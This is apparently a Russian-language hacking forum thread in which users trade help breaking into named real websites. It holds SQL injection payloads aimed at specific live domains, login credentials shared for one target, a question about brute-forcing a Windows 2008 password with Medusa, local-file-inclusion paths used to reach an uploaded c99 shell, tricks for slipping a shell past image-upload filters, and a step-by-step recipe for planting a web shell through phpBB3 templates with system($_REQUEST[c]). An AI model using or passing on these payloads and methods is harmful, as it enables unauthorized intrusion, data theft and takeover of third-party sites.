LFI (Local File Include) - это тип уязвимости. Подробнее в поиске. Папка с правами - папка, в которую возможно записать что-либо, и которая доступна из-под веба.
Как здесь хоть что то вывести? http://pocketbook.by/index.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
http://pocketbook.by/index.php?id=200+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)+--+ Duplicate entry '5.0.51a-24+lenny4-log1' for key 1
Заливаю шелл через форму отправки изображений. При загрузке имя файла меняется на .jpg/.gif и т.д. Знаю папку куда все складывается,но прямого доступа к ней не имею. Шелл с расширением .php.jpg переименовывается в .jpg + замена имени. Как быть?
Ребят задался вопросом. Есть ли по дефолту в вин2008, число неудачных попыток входов в систему, после чего лок? Просто 3-и сутки медузой перебираю безрезультатно (Хотя знаю, что в словаре точно есть правильный пасс)
Здесь вывести через ошибку возможно? https://www.nyhistory.org/web/default.php?section=public_programs&page=detail&program=1499350+%6f%72%64%65%72+by+1000+--+
Имеется sqli в mssql без вывода ошибки. Сайт: www.truck market.ru Перед проведением атаки следует вторизоваться тут: http://www.truckmarket.ru/enter.php. Например по этому акку: login:a1840198 pass:a1840198 sqli: По логике: если запрос верен - в текстбокстах отображается уже имеющаяся инфа. Ступор на получении списка таблиц. Получаем одну так: Далее пробую сначала брать следующию так: Но удается выудить только три, потом идет повтор: Опять повтор. Почитал доки. select top - возвращает случайныую запись. Умельцы как-то убирают случайность, добовляя в конец order+by+<*>. Но я не докурил как =( Подставляя случайные слова в первый методе смог получить вот такой список таблиц: Как вытащить все таблицы? Мне бы увидеть пример имуляции limit, вывести колонки и инфу думаю смогу сам. p.s Проблема с данной уязвимостью, уже постилась на rdot.org Но 2ва дня не кто помочь не может.
Как можно это обработать на "чистый" лист? http://www.elitecrownmoldings.com/home.php?cat=6 кстати, тут походу у пользователя есть права на INSERT =) и еще вопросик, как можно узнать привилегии пользователя mysql, ну и других дб?
Дело не в правах пользователя на INSERT, а в том что в уязвимый запрос входит команда INSERT. Могу сказать, что INSERT-иньекцию провести не удасться, т.к. в запрос входит путь, который подделать\обрезать не возможно. Code: /product.php?prod'uctid=256 => INSERT INTO xcart_stats_pages(page) VALUES('/product.php?prod'uctid=256') /pro'duct.php?productid=256 => Not Found Мдя уж, забавно По поводу привилегий: Максимальный привелегии, что у тебя могут быть (которые помогаю в SQLi) это доступ на чтение mysql.user, чтобы узнать пасс админа MySQL и подключиться удаленно\к phpMyAdmin, если есть, ну или пробрутить FTP\SSH. Ну или file_priv, что тебе позволяет читать файлы, а при отсутсвие mq, то и заливать файлы Ну и обычно если есть доступ к mysql.user, то и есть доступ в file_priv. Ну и по поводу раскручивания данной инъекции. Запрос выдает ошибку только при кавычке подставленной, если ее нет, то все отбрасываеться. Попробуй избавиться от ошибки при кавычке. Ты залил шелл в /tmp, в котором храняться файлы сессий, к которому нету доступа из под веба, то есть никак не прочитать (ну если нету LFI\RFI). Попробуй просканить сайт на директории, посмотри в каких папках лежат картинки\js\css \etc и пробуй залить во все эти диры, ведь я, надеюсь, у тебя есть путь к сайту? Если нету то читай мой пост пару страниц ниже...
нашол путь тот который надо http://www.xxx.ru/show.php?f=../../../../var/lib/mysql/c99.php но там пустая страница, тоесть меню сайта и шапка есть а там где контент пусто пробовал залить в js (такая папка есть) но не могу точный путь найти к ней, читал etc/passwd там ничего такого нет
google.ru > Заливка шелла phpbb3 site:forum.antichat.ru google.ru > Заливка шелла phpbb3 site:rdot.org гуглим правильно (с)
Заливка шела через темплейты в phpBB3 (необходим доступ в админку). 1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates). 2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции: <!-- PHP --> system($_REQUEST[c]); <!-- ENDPHP --> Источник